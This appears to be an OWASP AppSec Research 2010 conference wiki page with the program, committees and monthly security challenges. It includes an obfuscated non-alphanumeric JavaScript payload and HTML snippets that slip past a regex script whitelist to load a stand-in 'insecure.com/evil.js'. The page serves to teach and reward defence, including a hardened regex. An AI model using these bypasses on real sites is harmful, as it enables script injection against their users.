OWASP AppSec Research 2010 - Stockholm, Sweden

Invitation
Ladies and Gentlemen,

On June 21-24, 2010, let's all meet in beautiful Stockholm, Sweden. The OWASP chapters in Sweden, Norway, and Denmark hereby invite you to OWASP AppSec Research 2010.

If you have any questions, please email the conference chair: john.wilander at owasp.org



Sponsors
Diamond sponsor: Position open

Gold sponsors (2 taken, 2 open):

Silver sponsors: 8 positions open

For full sponsoring program see the Sponsoring tab above.

"AppSec Research".equals("AppSec Europe")
This conference was formerly known as OWASP AppSec Europe. We have added 'Research' to highlight that we invite both industry and academia. All the regular AppSec Europe visitors and topics are welcome along with contributions from universities and research institutes.

This will be the European conference for anyone interested in or working with application security. Co-host is the Department of Computer and Systems Science at Stockholm University, offering a great venue in the fabulous Aula Magna.

Countdown Challenges -- Free Tickets to Win!
There will be a challenge posted on the conference wiki page the 21st every month up until the event. The winner will get free entrance to the conference. What are you waiting for? Go to the Challenges tab and have fun!

Organizing Committee
• John Wilander, chapter leader Sweden (chair)
• Mattias Bergling (vice chair)
• Alan Davidson, Stockholm University/Royal Institute of Technology (co-host)
• Ulf Munkedal, chapter leader Denmark
• Kåre Presttun, chapter leader Norway
• Stefan Pettersson (sponsoring coordinator)
• Carl-Johan Bostorp (schedule and event coordinator)
• Martin Holst Swende (coffee/lunch/dinner)
• Kate Hartmann, OWASP
• Sebastien Deleersnyder, OWASP Board

Welcome to Stockholm next year! Regards, John Wilander

Call for Papers and Proposals
We offer two options:

1. Full papers. Peer-reviewed 12-page papers that will be published in formal proceedings by Springer-Verlag Lecture Notes in Computer Science (final approval pending).

2. Presentation proposals. A presentation proposal should consist of a 2-page position paper representing the essential matter proposed by the speaker(s). Proposals must include sufficient material for the reviewers to make an informed decision.

Topics of Interest
We encourage the publication and presentation of new tools, new methods, empirical data, novel ideas, and lessons learned in the following areas:
• Web application security
• Security aspects of new/emerging web technologies/paradigms (mashups, web 2.0, offline support, etc)
• Security in web services, REST, and service oriented architectures
• Security in cloud-based services
• Security of frameworks (Struts, Spring, ASP.Net MVC etc)
• New security features in platforms or languages
• Next-generation browser security
• Security for the mobile web
• Secure application development (methods, processes etc)
• Threat modeling of applications
• Vulnerability analysis (code review, pentest, static analysis etc)
• Countermeasures for application vulnerabilities
• Metrics for application security
• Application security awareness and education

Submission Deadline and Instructions
Submission deadline is Sunday February 7th 23:59 (Apia, Samoa time). Submissions should be at most 12 pages long in the Springer LNCS style for "Proceedings and Other Multiauthor Volumes". Templates for preparing papers in this style for LaTeX, Word, etc can be downloaded from: http://www.springer.com/computer/lncs?SGWID=0-164-7-72376-0. Full papers must be submitted in a form suitable for anonymous review: remove author names and affiliations from the title page, and avoid explicit self-referencing in the text.

Program Committee
• John Wilander, Omegapoint and Linköping University (chair)
• Alan Davidson, Stockholm University/Royal Institute of Technology (co-host)
• Andrei Sabelfeld, Chalmers UT
• Engin Kirda, Institute Eurecom
• Lieven Desmet, Katholieke Universiteit Leuven
• Martin Johns, University of Passau
• Christoph Kern, Google
• Sergio Maffeis, Imperial College London
• Ulf Lindqvist, SRI International
• William Robertson, UC Santa Barbara

Training
To be filled in.

Venue
Aula Magna, Stockholm University

To be filled in.

Sponsoring
We are now welcoming sponsors for OWASP AppSec Research 2010. Take the opportunity to support next year's major appsec event in Europe! The full sponsoring program is available as pdfs:

Sponsoring program in English:

Sponsoring program in Swedish:



Countdown Challenges -- Free Tickets to Win!
There will be a challenge posted on the conference wiki page the 21st every month up until the event. The winner will get free entrance to the conference. Be sure to sign up for the conference mailing list to get a monthly reminder.

AppSec Research Challenge 4: Who's Who in Security?
This month's AppSec Research 2010 Challenge is to identify a number of people that are, in one way or another, known in the security business, by their picture.

There are thirteen photos in total, portraying thirteen different individuals. Below, you will find a list of suggested names. As you can tell, there are more than thirteen names so yeah, there are a few false positives :).

Answers should be submitted to Stefan Pettersson as a simple list of picture-to-name mappings. The first correct answer will be awarded free entrance for one to OWASP AppSec Research 2010 in Stockholm.

The Names
Dinis Cruz, Gordon "Fyodor" Lyon, David Litchfield, Dave Aitel, Bruce Schneier, Dave Wichers, Gene Spafford, MafiaBoy, MySpace Samy, Tom Brennan, Halvar Flake, Alex Sotirov, Jeff Williams, Jennifer Granick, Kate Hartmann, Mudge, Lance Spitzner, Dan Kaminsky, Brian Chess, Joanna Rutkowska, Crispin Cowan, Michael Howard, Jay Beale, Ross Anderson, Dawn Song, Robert "rsnake" Hansen, and Solar Designer.

AppSec Research Challenge 3: Non-Alphanumeric JavaScript
The August AppSec Research 2010 Challenge was to create a JavaScript alert("owasp") that pops up the word 'owasp', case-insensitive, without using any alphanumeric characters (0-9a-zA-Z). There was tremendous activity and we want to thank everyone who participated. The size of the final result was almost a third of the first entry (see chart below). Want to check out the winning snippet by .mario? Enter the following in the Firebug console:

ω=[[Ṫ,Ŕ,,É,,Á,Ĺ,Ś,,,Ó,Ḃ]=!''+[!{}]+{}][Ś+Ó+Ŕ+Ṫ],ω[Á+Ĺ+É+Ŕ+Ṫ](Ó+ω[Ḃ+Ṫ+Ó+Á]('Á«)'))

It is based on a few different ideas. First of all, a destructuring assignment of the form

[a,b,c,,e]="abcde" // a="a", b="b", c="c", e="e"; the empty slot skips "d"

which is performed on the string "truefalse[object Object]":

[Ṫ,Ŕ,,É,,Á,Ĺ,Ś,,,Ó,Ḃ]=!''+[!{}]+{} // right-hand side is "truefalse[object Object]", giving Ṫ="t", Ŕ="r", É="e", Á="a", Ĺ="l", Ś="s", Ó="o", Ḃ="b"

Also, the following construction obtains the sort function, which in Firefox leaks the window object when called without arguments. This is a Firefox quirk of the time (the reason the challenge required the snippet to run in Firefox/Firebug) and should not be expected from other engines:

ω=[]["sort"] // ω now gives access to window

Therefore, ω["alert"] invokes window.alert, and ω["btoa"] is window.btoa. To generate the string "owasp", the letter "o" comes from the destructured string, and "wasp" is obtained by calling btoa on the three Latin-1 characters "Á«)" (bytes C1 AB 29), whose base64 encoding is exactly "wasp".

This was really a great team effort, and I think a lot of us learned some new tricks. The final winner was .mario. Congratulations!



JavaScript Without Alphanumeric Characters?
It is possible to write valid JavaScript completely without alphanumeric characters (0-9a-zA-Z). To produce a number, you can instead start from an empty string, '', and interpret it as a boolean with a bang: !'' evaluates to the boolean value true. true, interpreted as a numeric value, equals one. Thus,

$ = +!''; // $ === 1

$++;$++; // $ === 3

In a similar fashion, strings can be created from strings embedded in the language. The boolean value true can be converted to a string by concatenation, and the result accessed by numeric index to, for example, produce the letter 'e':

â = !''+''; // â === "true"

â[$] // "true"[3] === "e"
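The following is an added example (not code from the challenge write-up or from .mario's entry) that generates and checks the building blocks of the winning snippet discussed above: the destructuring pattern over "truefalse[object Object]", the spelling of "sort", "alert" and "btoa" from the harvested letters, and the btoa preimage step that turns "Á«)" into "wasp". The identifier names follow the snippet on the page; the helper functions and their names are our own, and Buffer assumes Node.js. Whether the []["sort"] lookup really reaches window.alert is the Firefox-specific part of the challenge, so the assembled payload is only built and checked as text, never evaluated.

```javascript
// Added example, not part of the original challenge page.
const ALNUM = /[0-9A-Za-z]/;

// Every letter in the snippet is pulled out of this string, which is what
// !''+[!{}]+{} evaluates to: true + "false" + "[object Object]".
const LETTER_POOL = !'' + [!{}] + {}; // "truefalse[object Object]"

function isNonAlphanumeric(code) {
  return !ALNUM.test(code);
}

// Which identifier stands for which letter (names as used on the page).
// Only letters that occur in LETTER_POOL can be harvested this way.
const LETTERS = { Ṫ: 't', Ŕ: 'r', É: 'e', Á: 'a', Ĺ: 'l', Ś: 's', Ó: 'o', Ḃ: 'b' };

// Build the destructuring assignment: each identifier sits at the index of
// its letter in LETTER_POOL; every other position is left as a hole.
function buildDestructure(letters) {
  const slots = [];
  for (const [ident, ch] of Object.entries(letters)) {
    const idx = LETTER_POOL.indexOf(ch);
    if (idx < 0) throw new Error(`'${ch}' is not in the letter pool`);
    slots[idx] = ident;
  }
  const pattern = Array.from(slots, s => s ?? '').join(',');
  return `[${pattern}]=!''+[!{}]+{}`;
}

// Spell a word as a sum of harvested identifiers, e.g. "sort" -> "Ś+Ó+Ŕ+Ṫ".
function spell(word, letters) {
  const byLetter = Object.fromEntries(
    Object.entries(letters).map(([ident, ch]) => [ch, ident]));
  return [...word].map(ch => {
    if (!(ch in byLetter)) throw new Error(`no identifier for '${ch}'`);
    return byLetter[ch];
  }).join('+');
}

// Run the generated destructuring for real and return the spelled words.
// The identifiers are function parameters, so nothing leaks into globals.
function evaluateWords(words, letters) {
  const idents = Object.keys(letters);
  const body = buildDestructure(letters) + ';return [' +
    words.map(w => spell(w, letters)).join(',') + '];';
  return new Function(...idents, body)();
}

// btoa() step: four base64 characters come from exactly three input bytes,
// so the string whose btoa() is `group` is simply its base64 decoding read
// as Latin-1. The trick only works when none of those bytes is alphanumeric.
function btoaPreimage(group) {
  if (!/^[A-Za-z0-9+/]{4}$/.test(group)) {
    throw new Error('need exactly four base64 characters without padding');
  }
  const preimage = Buffer.from(group, 'base64').toString('latin1');
  if (!isNonAlphanumeric(preimage)) {
    throw new Error(`preimage of '${group}' contains alphanumerics: ${preimage}`);
  }
  return preimage;
}

// Stand-in for window.btoa over a Latin-1 string, used for checking only.
function base64OfLatin1(s) {
  return Buffer.from(s, 'latin1').toString('base64');
}

// Assemble the payload in the shape of the winning entry. Assumes the target
// is one pool letter followed by a four-letter base64 group, as with "owasp".
function buildPayload(target) {
  const first = target[0];                    // 'o' straight from the pool
  const rest = btoaPreimage(target.slice(1)); // 'wasp' via btoa
  const L = LETTERS;
  const code = `ω=[${buildDestructure(L)}][${spell('sort', L)}],` +
    `ω[${spell('alert', L)}](${spell(first, L)}+ω[${spell('btoa', L)}]('${rest}'))`;
  if (!isNonAlphanumeric(code)) throw new Error('payload contains alphanumerics');
  return code;
}
```

buildPayload('owasp') reproduces the snippet from the page character for character, and btoaPreimage('aaaa') throws, because its preimage starts with the byte 0x69 ('i'): the btoa trick is only available for base64 groups whose decoding happens to avoid the alphanumeric byte ranges.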

Previous Similar Contest
These two techniques were behind a previous contest at the forum "sla.ckers.org", where the task was to create alert(1) in as few characters as possible while using no alphanumeric characters at all. The code actually being executed is:

([]["sort"])["alert"](1) // since []["sort"] leaks the window object in FF, this becomes window["alert"](1), which is another form of window.alert(1)

The winner, or at least the current leading entry, is 84 bytes long and looks like this:

(Å='',[Į=!(ĩ=!Å+Å)+{}][Į[Š=ĩ[++Å]+ĩ[Å-Å],Č=Å-~Å]+Į[Č+Č]+Š])[Į[Å]+Į[Å+Å]+ĩ[Č]+Š](Å)

The Challenge
August's challenge was to, in a similar fashion, create an alert("owasp"), case-insensitive, not using any alphanumeric characters. The shortest working code snippet submitted by September 18th 23:59:59 UTC won a free ticket. By "working" we meant JavaScript that executes in Firefox/Firebug, not depending on any Firebug DOM variables for execution.

Submissions were made as comments to the challenge 3 blogpost on Owasp Sweden. Check it out.

AppSec Research Challenge 2: OWASP Crossword Puzzle
July's crossword challenge is over. Many permutations arrived in our inbox but it was tricky to get it completely right. Congratulations to Johannes Dahse and Johan Nilsson who in the end were allowed to join forces to be able to find the correct solution. They win a 50 % conference ticket discount each.

You find the solution below.



AppSec Research Challenge 1: Input Validation and Regular Expressions
This challenge is over. The winner was Partik Nordlén. To see the solution(s), please visit the appsec_eu_2010 mailing list archive.

Some people, when confronted with a problem, think “I know, I'll use regular expressions.” Now they have two problems.        --Jamie Zawinski, in comp.emacs.xemacs

The 21st of each month up until the conference in June 2010 we'll have a countdown challenge posted here. The winner each month will get a free entrance ticket worth about €300/$400. Be sure to sign up for the conference mailing list to get a monthly reminder.

The Challenge
A community is hosted on a very large domain, yahoogle.com. The users of that community all have profiles, where they are allowed to use basic HTML for customization, as well as JavaScript files hosted on the domain.

All the code for the profile pages is filtered on the server side, and whenever a piece of code containing "<script..." is encountered, the following regular expression is used to validate that the script loaded is hosted on a subdomain of yahoogle.com:

.*(<script){1}([^>]+)src=('http:\/\/[a-zA-Z]+.yahoogle.com\/scripts\/[0-9A-Za-z]+\.js').*\/>

Capture group 3 is then also checked against a whitelist of allowed scripts on that domain. The whitelist consists of "http://secure.yahoogle.com" and "http://scripts.yahoogle.com".

Your task is to formulate a snippet of HTML that goes correctly through the filter and the whitelist, but loads the script "http://insecure.com/evil.js" instead. Also, rework the regular expression to defend against your "attack".

Email your solution to Martin Holst Swende <martin.holst_swende@owasp.org>. The first correct answer wins a free ticket to the conference. The free ticket is personal and the judgement of the organizing committee can not be overruled :).
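As an added illustration (not the contest's published solution, which lives in the mailing list archive), here is the filter as the page describes it, run against a few constructed profile snippets, next to a reworked regular expression. The page does not say how the whitelist step was implemented, so it is assumed here to be a prefix match on the captured URL with the quotes stripped; the snippets, helper names and the reworked regex are ours.

```javascript
// Added example, not part of the original challenge page.

// The regular expression exactly as stated in the challenge.
const ORIGINAL_FILTER =
  /.*(<script){1}([^>]+)src=('http:\/\/[a-zA-Z]+.yahoogle.com\/scripts\/[0-9A-Za-z]+\.js').*\/>/;

const WHITELIST = ['http://secure.yahoogle.com', 'http://scripts.yahoogle.com'];

// Assumed whitelist check: strip the quotes the regex captured, then require
// one of the whitelisted origins followed by a slash.
function whitelisted(quotedUrl) {
  const url = quotedUrl.replace(/^'|'$/g, '');
  return WHITELIST.some(origin => url.startsWith(origin + '/'));
}

// The filter as described: regex first, then the whitelist on capture group 3.
function originalFilterAccepts(html) {
  const m = ORIGINAL_FILTER.exec(html);
  return m !== null && whitelisted(m[3]);
}

// Reworked: anchored at both ends, literal dots escaped, hosts taken from the
// whitelist, and exactly one attribute allowed. There is no room for a second
// <script> before the match nor for a second src= attribute inside the tag.
const HARDENED_FILTER =
  /^<script\s+src='http:\/\/(secure|scripts)\.yahoogle\.com\/scripts\/[0-9A-Za-z]+\.js'\s*\/>$/;

function hardenedFilterAccepts(html) {
  return HARDENED_FILTER.test(html);
}

// Constructed snippets.
const LEGIT = "<script src='http://scripts.yahoogle.com/scripts/profile.js' />";

// The leading .* is unanchored, so the regex can match the second tag while
// the browser has already executed the first one.
const EXTRA_TAG =
  "<script src='http://insecure.com/evil.js'></script>" +
  "<script src='http://scripts.yahoogle.com/scripts/profile.js' />";

// ([^>]+) swallows a first src attribute. HTML parsers keep the first
// occurrence of a duplicated attribute, so evil.js is what gets loaded.
const DUPLICATE_SRC =
  "<script src=\"http://insecure.com/evil.js\" src='http://scripts.yahoogle.com/scripts/profile.js' />";

// Side-by-side verdicts for each snippet.
function compareFilters() {
  return [LEGIT, EXTRA_TAG, DUPLICATE_SRC].map(html => ({
    html,
    original: originalFilterAccepts(html),
    hardened: hardenedFilterAccepts(html),
  }));
}
```

The original filter accepts all three snippets; the reworked one accepts only LEGIT. The reworked regex is deliberately strict (single-quoted src, no other attributes), which is the price of making a regex say anything reliable about a tag; a production filter would parse the tag and compare the resolved URL's origin against the whitelist instead, which is the point of the Zawinski quote above.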